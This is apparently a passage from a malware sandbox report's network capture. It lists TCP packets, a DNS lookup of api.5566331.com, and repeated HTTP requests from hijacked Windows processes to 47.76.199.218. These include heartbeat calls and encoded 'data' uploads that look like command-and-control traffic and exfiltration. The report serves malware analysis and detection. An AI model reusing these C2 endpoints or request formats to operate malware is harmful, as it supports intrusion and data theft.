Jan 2, 2025 09:29:46.638694048 CET	49991	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:46.643680096 CET	80	49991	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:46.643908024 CET	49991	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:46.644011974 CET	49991	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:46.648869038 CET	80	49991	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:46.648941040 CET	49991	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:46.653805971 CET	80	49991	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:47.008842945 CET	49991	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:47.059273005 CET	80	49991	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:47.220357895 CET	80	49991	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:47.220662117 CET	49991	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:51.224584103 CET	49992	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:51.229433060 CET	80	49992	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:51.229518890 CET	49992	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:51.230673075 CET	49992	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:51.235652924 CET	80	49992	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:51.235726118 CET	49992	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:51.240473032 CET	80	49992	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:51.775388956 CET	49992	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:51.812424898 CET	80	49992	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:51.812536955 CET	49992	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:56.817442894 CET	49993	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:56.822391987 CET	80	49993	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:56.822525978 CET	49993	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:56.822602987 CET	49993	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:56.827414989 CET	80	49993	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:56.827496052 CET	49993	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:56.832351923 CET	80	49993	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:57.424844027 CET	49993	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:57.429987907 CET	80	49993	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:57.430046082 CET	49993	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:02.456795931 CET	49994	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:02.461678982 CET	80	49994	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:02.461781979 CET	49994	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:02.461817026 CET	49994	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:02.466593981 CET	80	49994	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:02.466649055 CET	49994	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:02.471424103 CET	80	49994	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:02.836863995 CET	49994	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:02.887245893 CET	80	49994	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:03.062726974 CET	80	49994	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:03.062915087 CET	49994	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:07.864052057 CET	49995	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:07.869144917 CET	80	49995	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:07.869252920 CET	49995	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:07.869333029 CET	49995	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:07.874224901 CET	80	49995	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:07.874317884 CET	49995	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:07.879165888 CET	80	49995	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:08.243488073 CET	49995	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:08.291366100 CET	80	49995	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:08.453397036 CET	80	49995	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:08.453474045 CET	49995	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:14.616816044 CET	49996	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:14.621848106 CET	80	49996	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:14.622060061 CET	49996	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:14.622060061 CET	49996	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:14.626935959 CET	80	49996	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:14.627007961 CET	49996	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:14.631934881 CET	80	49996	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:14.993012905 CET	49996	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:15.039370060 CET	80	49996	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:15.226785898 CET	80	49996	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:15.227041960 CET	49996	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:20.093611002 CET	49997	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:20.098473072 CET	80	49997	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:20.098550081 CET	49997	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:20.098669052 CET	49997	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:20.103430986 CET	80	49997	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:20.103477955 CET	49997	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:20.108253002 CET	80	49997	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:20.461962938 CET	49997	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:20.507297039 CET	80	49997	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:20.712734938 CET	80	49997	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:20.714472055 CET	49997	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:25.488251925 CET	49998	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:25.493257999 CET	80	49998	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:25.493360043 CET	49998	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:25.493458986 CET	49998	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:25.498229980 CET	80	49998	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:25.498305082 CET	49998	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:25.503216028 CET	80	49998	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:25.868252039 CET	49998	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:25.919277906 CET	80	49998	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:26.080015898 CET	80	49998	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:26.080180883 CET	49998	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:30.895293951 CET	49999	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:30.900274992 CET	80	49999	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:30.901372910 CET	49999	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:30.901451111 CET	49999	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:30.906148911 CET	80	49999	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:30.908499956 CET	49999	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:30.913240910 CET	80	49999	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:31.275485992 CET	49999	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:30:31.323371887 CET	80	49999	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:31.501740932 CET	80	49999	47.76.199.218	192.168.2.5
Jan 2, 2025 09:30:31.502062082 CET	49999	80	192.168.2.5	47.76.199.218

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:28:26.623742104 CET	59780	53	192.168.2.5	1.1.1.1
Jan 2, 2025 09:28:27.593492031 CET	53	59780	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 09:28:26.623742104 CET	192.168.2.5	1.1.1.1	0x27b7	Standard query (0)	api.5566331.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 09:28:27.593492031 CET	1.1.1.1	192.168.2.5	0x27b7	No error (0)	api.5566331.com		47.76.199.218	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

47.76.199.218:80

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	47.76.199.218	80	2360	C:\Windows\SysWOW64\control.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:28:27.677767038 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:28:27.682748079 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	47.76.199.218	80	2360	C:\Windows\SysWOW64\control.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:28:33.243375063 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:28:33.248488903 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	47.76.199.218	80	2360	C:\Windows\SysWOW64\control.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:28:38.743731976 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:28:38.748632908 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	47.76.199.218	80	2360	C:\Windows\SysWOW64\control.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:28:44.160310984 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:28:44.165363073 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49745	47.76.199.218	80	2360	C:\Windows\SysWOW64\control.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:28:51.092489004 CET	659	OUT	GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUfi9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL48d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXaYTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfmBM8ui63qGw1hOYc0Maww2aCZlGFx2cWqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4= HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 508
Jan 2, 2025 09:28:51.100594997 CET	508	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 35 35 31 26 64 61 74 61 3d 78 33 Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUfi9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL48d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXaYTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49780	47.76.199.218	80	5772	C:\Windows\SysWOW64\fontview.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:28:56.450787067 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:28:56.455946922 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49815	47.76.199.218	80	5772	C:\Windows\SysWOW64\fontview.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:01.854408979 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:01.859281063 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49850	47.76.199.218	80	5772	C:\Windows\SysWOW64\fontview.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:07.258675098 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:07.263497114 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49883	47.76.199.218	80	5772	C:\Windows\SysWOW64\fontview.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:12.680989981 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:12.685796022 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49919	47.76.199.218	80	5772	C:\Windows\SysWOW64\fontview.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:19.458445072 CET	659	OUT	GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSYQJSmUa4R0nKTUopxtu5aRZUmxtVTsHV29kf7cYL-MjTckRfIpjTbB7xzYWtqFO5vPdazU9kHSC8d0RJwPJPGxrPzKc6*Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfbfRmwgZ5cGzSvaFX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoVOv87GDYU96jq0srfmNJL5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pNJsxbItKeA*DsMEI= HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 508
Jan 2, 2025 09:29:19.463282108 CET	508	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 35 37 39 26 64 61 74 61 3d 48 2d Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSYQJSmUa4R0nKTUopxtu5aRZUmxtVTsHV29kf7cYL-MjTckRfIpjTbB7xzYWtqFO5vPdazU9kHSC8d0RJwPJPGxrPzKc6*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49956	47.76.199.218	80	3376	C:\Windows\SysWOW64\resmon.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:24.658730030 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:24.663598061 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49987	47.76.199.218	80	3376	C:\Windows\SysWOW64\resmon.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:30.057358980 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:30.062263012 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49988	47.76.199.218	80	3376	C:\Windows\SysWOW64\resmon.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:35.487802029 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:35.492857933 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49989	47.76.199.218	80	3376	C:\Windows\SysWOW64\resmon.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:40.884139061 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:40.889568090 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49991	47.76.199.218	80	3376	C:\Windows\SysWOW64\resmon.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:46.644011974 CET	659	OUT	GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRBSycwp2sHLkgahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3NM3WaD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7ZET6JoCuTkfmg25v5NfHejoxaRK3MJXB-kxeC8EXo86ufoEwJDBZ0YSyPVb187fRMrEsv98eZc3VzEm5jYhOnRaVHVPJIJu3VXi7efKDFzmUmEadB2kvhr4b6LDN6*7EvnQ711qTV-6DBxDbjTha0oYb8MNfPWDfiAJDK7Vh4kTGNE-Pd93SwqWoTbTib258IG4Cih5PIqc1D5GQSGoS4yMsZ5R313wyOFatSdhLrIN2c3W1PA-jU7GXVAV0sjibBZrNgSIco= HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 508
Jan 2, 2025 09:29:46.648941040 CET	508	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 36 30 37 26 64 61 74 61 3d 72 7a Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRBSycwp2sHLkgahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3NM3WaD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49992	47.76.199.218	80	6404	C:\Windows\SysWOW64\BackgroundTransferHost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:51.230673075 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
Jan 2, 2025 09:29:51.235726118 CET	85	OUT	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36 Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49993	47.76.199.218	80	6404	C:\Windows\SysWOW64\BackgroundTransferHost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:29:56.822602987 CET	235	OUT	GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1 Host: 47.76.199.218:80 Content-type: application/x-www-form-urlencoded Accept: text/plain Content-Length: 85
